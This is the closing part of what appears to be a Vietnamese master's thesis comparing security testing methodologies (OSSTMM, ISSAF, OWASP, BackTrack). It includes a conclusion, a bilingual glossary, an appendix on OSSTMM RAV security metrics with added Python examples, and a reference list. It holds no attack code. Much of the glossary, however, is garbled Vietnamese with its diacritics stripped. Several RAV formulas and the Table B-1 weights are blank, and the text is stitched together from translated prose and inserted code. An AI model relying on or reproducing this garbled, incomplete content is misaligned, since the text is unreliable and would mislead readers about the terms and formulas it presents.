3.6. Summary of chapter 3
The penetration test shows the severe harm of not regularly applying software patches, or of lacking appropriate protection for the IT assets of an organization or individual. Data can be viewed, modified and even deleted without the owner being likely to notice. Windows flaws have more exploits available than Linux ones. Another rather complex issue is vulnerability identification. A great many vulnerabilities are discovered, and today several organizations identify them, such as CVE, BID, OSVDB, ISS X-Force and Secunia, so when a vulnerability scanner is used the vulnerabilities it finds may be referenced under several different names. This issue is outside the scope of the thesis, but a good grasp of the naming conventions of the different organizations helps to identify a vulnerability precisely, understand its nature, and find its remedy.
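The naming problem described above can be handled mechanically: the same vulnerability appears as MS08-067 in one tool's output and as CVE-2008-4250, BID 31874 or TA08-297A in another's. As an added example (not code from the thesis), the following Python script extracts identifiers in the schemes Table 9 lists from free-form finding text and merges findings that share any identifier into one record per vulnerability; the sample findings, the SCHEMES table and the merge_findings() helper are constructed here.

```python
"""Cross-reference vulnerability identifiers from different naming schemes.

Added example, not code from the thesis: section 3.6 notes that one
vulnerability may be reported under CVE, BID, Microsoft bulletin, CERT or
Secunia names. This merges findings that use different schemes into one
record per vulnerability. The sample findings are constructed from the
references listed in Table 9 (MS08-067 / CVE-2008-4250).
"""
import re
from collections import defaultdict

# One pattern per scheme; a capturing group isolates the bare number where
# the scheme name is written separately (BID 31874, SECUNIA 32326).
SCHEMES = {
    "CVE": re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.I),
    "MS": re.compile(r"\bMS\d{2}-\d{3}\b", re.I),
    "BID": re.compile(r"\bBID[:\s]*(\d+)\b", re.I),
    "CERT": re.compile(r"\bTA\d{2}-\d{3}[A-Z]\b", re.I),
    "SECUNIA": re.compile(r"\bSECUNIA[:\s]*(\d+)\b", re.I),
}

# Constructed sample: the same vulnerability as three tools might report it,
# plus one finding without any identifier.
SAMPLE_FINDINGS = [
    ("Nessus", "MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling"),
    ("NeXpose", "CVE-2008-4250 (BID 31874, SECUNIA 32326)"),
    ("OpenVAS", "CERT TA08-297A / MS08-067 / CVE-2008-4250"),
    ("Nessus", "SSH server banner: no reference"),
]


def extract_ids(text):
    """Return {scheme: identifier} for every identifier found in a string."""
    found = {}
    for scheme, pat in SCHEMES.items():
        m = pat.search(text)
        if m:
            value = m.group(1) if m.groups() else m.group(0)
            found[scheme] = value.upper()
    return found


def merge_findings(findings):
    """Group findings that share any identifier (union-find over "SCHEME:id").

    findings: list of (tool_name, reference_text). Returns a dict keyed by the
    CVE when one is known, else by any identifier of the group."""
    parent = {}

    def find(x):
        while parent.setdefault(x, x) != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    per_finding = []
    for tool, text in findings:
        ids = extract_ids(text)
        per_finding.append((tool, ids))
        keys = [f"{s}:{v}" for s, v in ids.items()]
        for k in keys[1:]:
            union(keys[0], k)

    groups = defaultdict(lambda: {"ids": {}, "tools": set()})
    for tool, ids in per_finding:
        if not ids:  # nothing to correlate on
            continue
        root = find(next(f"{s}:{v}" for s, v in ids.items()))
        groups[root]["ids"].update(ids)
        groups[root]["tools"].add(tool)

    records = {}
    for g in groups.values():
        key = g["ids"].get("CVE") or next(iter(g["ids"].values()))
        records[key] = {"ids": g["ids"], "tools": sorted(g["tools"])}
    return records


if __name__ == "__main__":
    for key, rec in merge_findings(SAMPLE_FINDINGS).items():
        print(key, rec)
```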
CONCLUSION
The OSSTMM method emphasizes security analysis in order to produce actual security metrics, with the aim of determining a security level whose results are accurate, consistent and repeatable, and pays little attention to guidance on using security assessment tools; ISSAF, by contrast, emphasizes risk analysis and gives guidance on using tools that are both developed in-house and gathered from third-party sources (mostly open source). The OWASP method also emphasizes risk analysis, but its main subject is the web application; although it describes penetration testing techniques quite well, OWASP encourages developing web applications securely from the earliest stage of development, with techniques such as manual review and assessment, threat modeling and source code review. The BackTrack method is essentially a penetration testing process backed by a rich and diverse pool of tools that is managed uniformly and updated regularly.
Most of the methods hold that penetration testing is important but is not the main instrument for controlling the security of a system. Clearly, penetration testing only makes sense when performed in the production environment, where the target operates and interacts with its surroundings and with various applications. Such interaction can create vulnerabilities and weaknesses that do not appear when the target runs in isolation or in a laboratory environment. Penetration testing also confirms that security vulnerabilities are real and can be exploited. It is therefore regarded as the final measure, after the other security measures such as vulnerability scanning, risk assessment, security analysis and source code review have been carried out, and the more regularly it is performed the better.
There are a great many penetration testing tools, but few of them are really usable; quite a number are buggy or produce no results. Using a single tool for a stage may be insufficient, because every tool produces a fair number of wrong results, especially false positives. A task should therefore be carried out with several equivalent tools and the results compared.
The thesis has studied four security testing methods in common use today and analyzed the advantages and disadvantages of each. From this, organizations and businesses can draw on the strengths of each to build a method suited to their own circumstances. The thesis has also presented a number of commonly used security testing tools and how to use them.
The thesis has not yet examined security testing methods such as IDART, which emphasizes red-team security assessment; the NIST guide for assessing security controls (NIST SP 800-53A); or WASC-TC, which focuses on web application security assessment like OWASP. Complex penetration testing techniques such as black-box penetration testing, web application penetration testing, and penetration testing through firewalls/IDS could not be carried out, for lack of time. A penetration testing approach that is currently the subject of much research, combining existing methods to draw on their respective strengths, has also not been examined.
Security testing is, on the whole, different in nature from software testing. It demands not only very good IT knowledge in general and security knowledge in particular, but also creativity. Security testing on the one hand verifies that the system works according to the functional requirements that its builder or owner intended, and on the other hand must demonstrate that the system can be made to work contrary to its design, as an attacker would see it. To perform security testing techniques well, the security tester must therefore actively learn to use the tools proficiently and be able to analyze the strengths and weaknesses of each.
In short, this is a fairly new field in Vietnam and in the world. There is as yet no standard, unified method for security testing; the subjective reason is the lack of coordinated research among organizations and individuals, and the objective reason is the lack of a standard security metric, since every organization assesses security levels differently. Given the limited time, mistakes could not be avoided, and the author very much hopes to receive comments from lecturers and fellow students, as well as from anyone interested in the field of IT security, to improve this work further.
PH LC A. THUT NG
Ting Vit Ting Anh Din gii
A
An ninh Security L thut ng vit tt ca an ninh thng tin
dng trong lun vn ny. An ninh l sn phm
v qui trnh m bo cc ti sn CNTT ca t
chc hoc c nhn c khng b truy cp, sa
i hoc xa khng php. ng thi m bo
cc c nhn hp php vn s dng c bnh
thng. Mc tiu ca an ninh theo CIA bao
gm 3 phn: b mt (confidentiality), ton vn
(integrity), sn sng (availability). Tuy nhin
hu ht cc ti liu khc thm tiu ch na l
trch nhim (accountability) [8].
An ton Safety Mt hnh thc bo v bng kim sot trc
nhng mi e da v nh hng ca n [5].
m tnh gi False negative Xc nh l ng nhng thc s l sai.
B
BackTrack BackTrack L HH Linux tp hp nhng phn mm an
ninh nhm mc ch KTXN.
Bt thng Anomaly L bt k nhng thnh phn khng ng nht
hoc khng bit m khng th kim sot v
khng th thc hin nhng hot ng bnh
thng
B mt tn cng Surface attack B mt tn cng l s thiu nhng phn tch
c th v cc kim sot chc nng tn ti trn
hng tng tc .
B mt Confidentiality L mt kim sot m bo rng cc bn tng
tc trao i v hin th mt ti sn m khng b
cc bn khc bit [5].
B qui tc Ruleset L tp hp cc quy tc hoc du hiu dng
so snh vi lung d liu trn mng hoc hnh
x ca h thng xc nh hnh ng thch
hp
Bi thng Indemnification L mt kim sot thng qua mt hp ng
gia ch s hu ti sn v mt bn i tc.
Hp ng ny c th theo hnh thc a ra
cnh bo nh l mt tin ca mt hnh
ng php l nu khng tun th cc lut
c cng b, ng thi cng b cc bo v
php l, hoc bn th 3 cung cp bo m ca
trong trng hp thit hi, ging nh cng ty
bo him [5].


95

C
Cnh bo Alarm L mt kim sot nhm thng bo mt s
tng tc ang hoc xy ra [5].
Chinh phc Subjugation L kim sot m bo rng ch nhng tng
tc xut hin ph hp vi nhng qui trnh
c nh ngha [5].
Cng ngh x hi Social engineering L k thut phi cng ngh thu thp thng
tin nhy cm nhm xm nhp h thng. K
thut ny c th l la o qua in thoi,
email, web, hoc li dng cc quan h gia
ngi vi ngi ly thng tin.
D
Do dai Resilience L kim sot i vi tt c cc tng tc
duy tr s bo v cc ti sn trong trng hp
sai lc hoc h hng [5].
Dng tnh gi False Positive Xc nh sai nhng thc s ng.

im yu Weakness L sai st hoc li dn n gin on, gim,
lm dng, hoc v hiu nhng c tnh nh
hng ca cc kim sot an ninh [5].
xp Porosity Cc im tng tc, cc hot ng, c phn
loi l Tm nhn, Truy cp, hoc Tin tng [5].
i Red-team L nhm c vai tr tn cng vo h thng.
i xanh Blue-team L nhm c vai tr bo v mt h thng.
H
Hn ch Limitation L trng thi hin ti ca gii hn nhn thc v
hiu bit i vi cc knh, hot ng, v kim
sot nh xc minh trong kim tra [5].
Hng hc Failure L kt qu ca mt li xut hin lm cho
chng trnh khng hot ng c hay hot
ng nhng kt qu khng nh mong i [16].
Hng Vector Chiu ca mt tng tc [5].
K
Kim sot Controls Cc kim sot gim nh hng v mt mt.
m bo rng nhng ti sn vt l hoc ti sn
thng tin cng nh cc knh gia chng c
bo v khi nhng kiu tng tc khng ng
nh nh ngha ca cc knh [5].
Kim th Testing Kim th l tin trnh thc thi mt chng
trnh vi mc ch tm ra li [1].
Kim th an ninh Security testing Mt hnh thc kim th h thng m theo
bn c gng lm tn thng c ch an ninh ca
mt ng dng hoc h thng [1].
Kim th xm nhp Penetration testing L mt k thut KTAN m ngi kim th
96

phi ng vai l nh k tn cng xm nhp
vo mc tiu nhm tm ra nhng im yu, l
hng qua gip t chc qun l mc tiu
thy c tc hi ca vic khng khc phc
nhng im yu .
Kim th hp en Black-box testing L mt kiu kim th m chng trnh c
xem nh mt thc th hon chnh v cu trc
ni b c b qua. D liu th nghim ch
c xut pht t c t ng dng [1][3][24].
Kim th hp trng White-box testing L mt kiu kim th m trong ta kim tra
cu trc bn trong ca mt chng trnh
[1][3][24].
Kim tra Audit L kt qu ca mt phn tch thc hin sau
kim th.
Khng thoi thc Non-Repudiation L mt kim sot nhm ngn chn bn tng
tc t chi vai tr ca n trong bt k tng
tc no [5].
Khai thc Exploit ch vic dng cng c hay phn mm li
dng mt l hng trong h thng/ng dng/
dch v lm h thng khng hot ng
ng chc nng.
K thut thm d Review techniques L nhng k thut xem xt v thm d h
thng mc tiu nhm nhn bit v tm nhng
im yu an ninh [24].
Continuity: The control over all interactions that maintains interactivity with assets in the event of corruption or failure [5].
Vulnerability: A flaw or error whereby an authorized person or process is denied access to the system; or an unauthorized person or process is granted access; or an unauthorized person or process is able to hide assets or themselves within the system [5].
Error: Appears in software as the result of a fault [16].
Log: Information stored on an IT device that lists the activities occurring on that device, kept for later review.
Threat: Any circumstance or event with the potential to adversely affect an information system through unauthorized access, modification of data, and/or denial of service.
Fuzzy analysis: The technique of feeding invalid, malicious and random data into an application in order to discover errors.
Concern: A flaw or error that disrupts, reduces, abuses, or nullifies the effects of the five process controls: non-repudiation, confidentiality, privacy, integrity and alarm [5].
Privacy: A control that ensures the way an asset is accessed, displayed or exchanged between parties is not known outside those parties [5].
Risk
Fault: A mistake or misunderstanding on the part of the developer during the software development process [16].
Visibility: A means of calculating opportunity. It comprises the target's assets that are known to exist within the scope.
Verification: The process of determining that the output of a stage of software development conforms to the preceding stage.
Sniffer: A hardware device or software tool attached to or installed on a network to capture the packets travelling across it.
Exposure: An unjustifiable action, flaw or error that provides direct or indirect visibility of targets or assets within the chosen channel scope.
Hacker: Used in this thesis to refer to people who use IT technical knowledge to attack IT systems for the purpose of sabotage or personal gain, as distinct from white-hat or ethical hackers. Also called an attacker.
White-hat hacker: Like a hacker, but the white-hat hacker's purpose is to help the owner of IT assets discover weaknesses so that they can be fixed.
Ethical hacker: Same as white-hat hacker.
Trust: An existing relationship in which one target accepts unrestricted interaction with another target within the scope.
Integrity: A control that ensures interacting parties are aware of changes to assets and processes [5].
Access: The ability to interact directly with an asset. Access is counted as the number of distinct locations where the interaction can occur.
Validation: The process of showing that the fully developed system conforms to the requirements specification document.
Authentication: A control implemented through a requirement for credentials based on identification and authorization.



APPENDIX B. FORMULA FOR COMPUTING ACTUAL SECURITY IN RAV
This section describes how Actual Security in RAV is computed, as implemented in the Excel workbook, in order to clarify the quantitative basis of the OSSTMM method. Actual Security in RAV units is computed as follows:


The parameters of the formula are defined as described below.
$\mathrm{OpSec}_{base}$ is the Operational Security base value, computed by:
$\mathrm{OpSec}_{base} = \log_2(1 + 100 \times \mathrm{OpSec}_{sum})$ (1)
where $\mathrm{OpSec}_{sum}$ is the Operational Security, also called the porosity of the scope, computed as the sum of the scope's Visibility ($P_V$), Access ($P_A$), and Trust ($P_T$):
$\mathrm{OpSec}_{sum} = P_V + P_A + P_T$
$FC_{base}$ is the Full Controls base; its value is computed by:
$FC_{base} = \log_2(1 + 10 \times LC_{sum})$ (2)
$LC_{sum}$ is the total count of Loss Controls (the security mechanisms put in place to protect operations), computed as:
$LC_{sum} = LC_{Au} + LC_{Id} + LC_{Re} + LC_{Su} + LC_{Ct} + LC_{NR} + LC_{Cf} + LC_{Pr} + LC_{It} + LC_{Al}$
where each term is the count of one of the 10 Loss Control categories:
$LC_{Au}$ is the number of Loss Controls of the Authentication category.
$LC_{Id}$ is the number of Loss Controls of the Indemnification category.
$LC_{Re}$ is the number of Loss Controls of the Resilience category.
$LC_{Su}$ is the number of Loss Controls of the Subjugation category.
$LC_{Ct}$ is the number of Loss Controls of the Continuity category.
$LC_{NR}$ is the number of Loss Controls of the Non-repudiation category.
$LC_{Cf}$ is the number of Loss Controls of the Confidentiality category.
$LC_{Pr}$ is the number of Loss Controls of the Privacy category.
$LC_{It}$ is the number of Loss Controls of the Integrity category.
$LC_{Al}$ is the number of Loss Controls of the Alarm category.
Corresponding to the 10 Loss Control counts above are 10 Missing Controls $MC_{Au}$, $MC_{Id}$, $MC_{Re}$, $MC_{Su}$, $MC_{Ct}$, $MC_{NR}$, $MC_{It}$, $MC_{Pr}$, $MC_{Cf}$, $MC_{Al}$, computed by the algorithm:
IF $\mathrm{OpSec}_{sum} - LC_{Au} \le 0$ THEN $MC_{Au} = 0$
ELSE $MC_{Au} = \mathrm{OpSec}_{sum} - LC_{Au}$
Similarly for the remaining Missing Controls. From these, the total Missing Controls is:
$MC_{sum} = MC_{Au} + MC_{Id} + MC_{Re} + MC_{Su} + MC_{Ct} + MC_{NR} + MC_{It} + MC_{Pr} + MC_{Cf} + MC_{Al}$
Total Missing Controls of class A:
$MC_A = MC_{Au} + MC_{Id} + MC_{Re} + MC_{Su} + MC_{Ct}$
Total Missing Controls of class B:
$MC_B = MC_{NR} + MC_{It} + MC_{Pr} + MC_{Cf} + MC_{Al}$
Next, the quantity $\mathrm{SecLim}_{base}$ is the Security Limitations base, computed as follows:
$\mathrm{SecLim}_{base} = \log_2(1 + 100 \times \mathrm{SecLim}_{sum})$ (3)



where $\mathrm{SecLim}_{sum}$ is the total Security Limitations, computed as the sum over each limitation type of its count multiplied by that limitation's weight value:
$\mathrm{SecLim}_{sum} = (L_V \times WV_V) + (L_W \times WV_W) + (L_C \times WV_C) + (L_E \times WV_E) + (L_A \times WV_A)$
with the quantities computed as in the following table:

Input              | Weight | Variables
Vulnerability, L_V |        | MC_sum: total Missing Controls
Weakness, L_W      |        | MC_A: total Missing Controls of class A
Concern, L_C       |        | MC_B: total Missing Controls of class B
Exposure, L_E      |        | P_V: total Visibility; P_A: total Access
Anomaly, L_A       |        | P_T: total Trust; MC_vg: percentage of missing coverage

Table B-1: Formulas for the quantities used to compute SecLim_sum
$MC_{vg}$ is computed by the following algorithm:
IF $\mathrm{OpSec}_{sum} \le 0$ THEN $MC_{vg} = 0$
ELSE

The last quantity in the Actual Security formula is Δ, the Actual Security Delta, used to compare products and solutions by estimating the changes a product or solution may introduce within the scope; it is computed by the formula:

(4)
where $FC_{base}$ is the Full Controls base value, computed by:
$FC_{base} = \log_2(1 + 10 \times LC_{sum})$
In addition, there is a value, True Protection (TruPro), that can be used as a simple expression of the optimal coverage of a given scope, in which 100 means an optimal relationship between porosity, True Controls and Security Limitations. True Protection is computed by:
$\mathrm{TruPro} = 100 + TC_{base} - \mathrm{OpSec}_{base} - \mathrm{SecLim}_{base}$ (5)
where $TC_{base}$ is the True Controls base, computed as:
$TC_{base} = \log_2\bigl(1 + 100 \times (\mathrm{OpSec}_{sum} - MC_{sum} \times 0.1)\bigr)$ (6)
Based on the same idea as True Controls, True Coverage (TCvg) can be used to measure the percentage of controls in place relative to the optimal number and placement of controls. True Coverage is then computed from the total Missing Controls by the following algorithm:
IF $\mathrm{OpSec}_{sum} \le 0$ THEN $TC_{vg} = 0$
ELSE

(7)
True Controls are used to measure the ideal placement of controls. The formula for the True Control of the Authentication control ($TC_{Au}$) is:
$TC_{Au} = \mathrm{OpSec}_{sum} - MC_{Au}$
Similarly for the remaining 9 True Controls. From these, the total True Controls value ($TC_{sum}$) is computed as:
$TC_{sum} = TC_{Au} + TC_{Id} + TC_{Re} + TC_{Su} + TC_{Ct} + TC_{NR} + TC_{It} + TC_{Pr} + TC_{Cf} + TC_{Al}$
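The computation this appendix walks through, as an added Python example (not the thesis's Excel workbook): it evaluates equations (1), (2), (3), (5), (6), the Missing Controls algorithm and the MC/TC sums on a constructed scope. The limitation weights WV_x, the sample counts and all function names are assumptions, since the page leaves the weight formulas and the Actual Security formula itself blank.

```python
import math
from typing import Dict, Mapping

# Loss-control categories as the appendix lists them: class A holds the five
# interactive controls, class B the five process controls (cf. MC_A and MC_B).
CLASS_A = ("Au", "Id", "Re", "Su", "Ct")
CLASS_B = ("NR", "It", "Pr", "Cf", "Al")
LOSS_CONTROLS = CLASS_A + CLASS_B
LIMITATIONS = ("V", "W", "C", "E", "A")  # vulnerability, weakness, concern, exposure, anomaly

def missing_controls(opsec_sum: float, lc: Mapping[str, float]) -> Dict[str, float]:
    """Appendix algorithm: MC_x = 0 if OpSec_sum - LC_x <= 0, else OpSec_sum - LC_x."""
    return {k: max(0.0, opsec_sum - lc[k]) for k in LOSS_CONTROLS}

def rav_report(p_v: float, p_a: float, p_t: float, lc: Mapping[str, float],
               limits: Mapping[str, float], weights: Mapping[str, float]) -> Dict[str, float]:
    """Evaluate equations (1), (2), (3), (5), (6) and the MC/TC sums from the appendix.

    The WV_x weights are caller-supplied (assumption) because the appendix table leaves
    the weight formulas blank; Actual Security itself is not on the page, so not computed."""
    opsec_sum = p_v + p_a + p_t                        # porosity of the scope
    mc = missing_controls(opsec_sum, lc)
    mc_sum = sum(mc.values())
    seclim_sum = sum(limits[k] * weights[k] for k in LIMITATIONS)
    r = {
        "OpSec_sum": opsec_sum,
        "OpSec_base": math.log2(1 + 100 * opsec_sum),                         # (1)
        "FC_base": math.log2(1 + 10 * sum(lc[k] for k in LOSS_CONTROLS)),    # (2)
        "MC_sum": mc_sum,
        "MC_A": sum(mc[k] for k in CLASS_A),
        "MC_B": sum(mc[k] for k in CLASS_B),
        "SecLim_base": math.log2(1 + 100 * seclim_sum),                       # (3)
        # (6): each MC_x <= OpSec_sum, so MC_sum <= 10*OpSec_sum and the log argument >= 1
        "TC_base": math.log2(1 + 100 * (opsec_sum - mc_sum * 0.1)),
        "TC_sum": sum(opsec_sum - mc[k] for k in LOSS_CONTROLS),             # TC_x = OpSec_sum - MC_x
    }
    r["TruPro"] = 100 + r["TC_base"] - r["OpSec_base"] - r["SecLim_base"]  # (5)
    return r

# Constructed sample scope (not from the thesis): 17 porosity points, the Cf control
# deployed more times than there are points (so MC_Cf clamps to 0), unit weights.
SAMPLE_LC = {"Au": 17, "Id": 5, "Re": 3, "Su": 0, "Ct": 10,
             "NR": 2, "Cf": 20, "Pr": 8, "It": 0, "Al": 4}
SAMPLE_LIMITS = {"V": 3, "W": 2, "C": 1, "E": 4, "A": 0}
SAMPLE_WEIGHTS = {k: 1.0 for k in LIMITATIONS}  # placeholder WV_x values (assumption)

def sample_report() -> Dict[str, float]:
    return rav_report(10, 5, 2, SAMPLE_LC, SAMPLE_LIMITS, SAMPLE_WEIGHTS)

if __name__ == "__main__":
    print(sample_report())
```

On the sample scope the over-deployed Cf control raises FC_base (log2 of 691) but not TC_base (log2 of 661), because MC_Cf is clamped to 0 rather than going negative; that clamping is why TC_base, not FC_base, feeds TruPro.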




APPENDIX C. REFERENCES
References (format: title, author, publisher, year of publication):
[1] The Art of Software Testing, 2nd ed., Glenford J. Myers, Wiley Publishing, 2004.
[2] Technical Guide to Information Security Testing and Assessment, Karen Scarfone, Murugiah Souppaya, Amanda Cody, Angela Orebaugh, 09/2008, http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
[3] BackTrack 4: Assuring Security by Penetration Testing, Shakeel Ali, Tedi Heriyanto, Packt Publishing, 04/2011.
[4] BackTrack 5: Wireless Penetration Testing, Vivek Ramachandran, Packt Publishing, 09/2011.
[5] OSSTMM 3: The Open Source Security Testing Methodology Manual, Peter Herzog, ISECOM, 2010.
[6] Build Your Own Security Lab: A Field Guide for Network Testing, Michael Gregg, Wiley Publishing, 2008.
[7] Offensive Security Lab Exercises, Mati Aharoni, 2007.
[8] CompTIA Security+ Study Guide, 4th ed., Emmett Dulaney, Wiley Publishing, 2007.
[9] Study: A Penetration Testing Model, Federal Office for Information Security (BSI).
[10] Network Security Assessment, Chris McNab, O'Reilly Publishing, 2008.
[11] Enterprise Network Testing, Andy Sholomon, Tom Kunath, Cisco Press, 03/2011.
[12] CEH Official Certified Ethical Hacker Review Guide, Kimberly Graves, Wiley Publishing.
[13] The Basics of Hacking and Penetration Testing, Dr. Patrick Engebretson, Syngress, 2011.
[14] Metasploit: The Penetration Tester's Guide, David Kennedy, Jim O'Gorman, Devon Kearns and Mati Aharoni, No Starch Press, 2011.
[15] Software Testing and Quality Assurance (Kiểm thử và bảo đảm chất lượng phần mềm), MSc. Thạc Bình Cường, electronic lecture notes for the course.
[16] Software Testing Textbook (Giáo trình kiểm thử phần mềm), Dr. Nguyễn Thanh Bình, 2008.
[17] IEEE 610.12-1990, IEEE Standard Glossary of Software Engineering Terminology, technical report, IEEE, 1990.
[18] Practical Software Testing, Ilene Burnstein, Springer, 2002.
[19] Research on Software Security Testing, World Academy of Science, Engineering and Technology, F. Y. Gu Tian-yang, Shi Yin-sheng & Yuan, 2010.
[20] Vulnerability Scanners, Master of Science thesis, Johan Nilsson, http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.102.7785&rep=rep1&type=pdf&ei=3LaLT-mjDbGSiQfz48zGCQ&usg=AFQjCNEk_3RdDERZC7oYVi8aYBnOCVsA9g
[21] Hercules Vulnerability Assessment and Remediation Overview, Citadel Security Software Inc., https://hercules.citadel.com/docs/301VulGuide.pdf, 07/2004.
[22] Software Security Testing, Bruce Potter, Gary McGraw, 2004.

[23] Network Security Testing, IXIA, http://www.ixiacom.com/solutions/testing_security, 02/2011.
[24] NIST SP 800-115, Technical Guide to Information Security Testing and Assessment, Karen Scarfone, Murugiah Souppaya, Amanda Cody, Angela Orebaugh, National Institute of Standards and Technology, 09/2008, http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
[25] The Art of Intrusion: The Real Stories Behind the Exploits of Hackers, Intruders & Deceivers, Kevin D. Mitnick, William L. Simon, Wiley Publishing, 2005.
[26] Information Systems Security Assessment Framework (ISSAF) draft 0.2, OISSG, 30/04/2006.
[27] OWASP Testing Guide version 3.0, OWASP Foundation, 2008.
[28] An Integrated Application of Security Testing Methodologies to e-voting Systems, Marco Ramilli and Marco Prandini, University of Bologna, Italy.
[29] Towards a Practical and Effective Security Testing Methodology, Marco Prandini and Marco Prandini, University of Bologna, Italy.
[30] How to Build and Use a Honeypot, Ralph Edward Sulton, http://www.infosecwriters.com/text_resources/pdf/build_and_use_honeypot.pdf
Online:
[i1] http://www.backtrack-linux.org
[i2] http://www.nessus.org
[i3] http://www.cert.org
[i4] http://www.isecom.org
[i5] http://www.oissg.org
[i6] http://www.owasp.org
[i7] http://projects.webappsec.org/threat-classification
[i8] http://www.hvaonline.net
[i9] http://www.bkav.com.vn/tieu_diem/-/view_content/content/tong-ket-tinh-hinh-virus-va-an-ninh-mang-nam-2011
[i10] http://www.bitpipe.com/tlist/Vulnerability-Assessments.html
[i11] http://csrc.nist.gov/publications/nistpubs/800-92/SP800-92.pdf
[i12] http://checklists.nist.gov
[i13] http://scap.nist.gov
[i14] http://csrc.nist.gov/publications/nistpubs/800-97/SP800-97.pdf
[i15] http://csrc.nist.gov/publications/nistpubs/800-94/SP800-94.pdf
[i16] http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf
[i17] http://www.idart.sandia.gov
[i18] http://csrc.nist.gov/publications/PubsSPs.html
[i19] http://www.nsa.gov/ia/industry/education/iam.cfm?MenuID=10.2.4.2
[i20] http://s-t-d.org
[i21] http://vipervast.sourceforge.net/index.html
[i22] http://fire.dmzs.com
[i23] http://www.e-fense.com/helix/
[i24] http://samurai.inguardians.com
[i25] http://sourceforge.net/projects/phlakproject/
[i26] http://www.pandasecurity.com
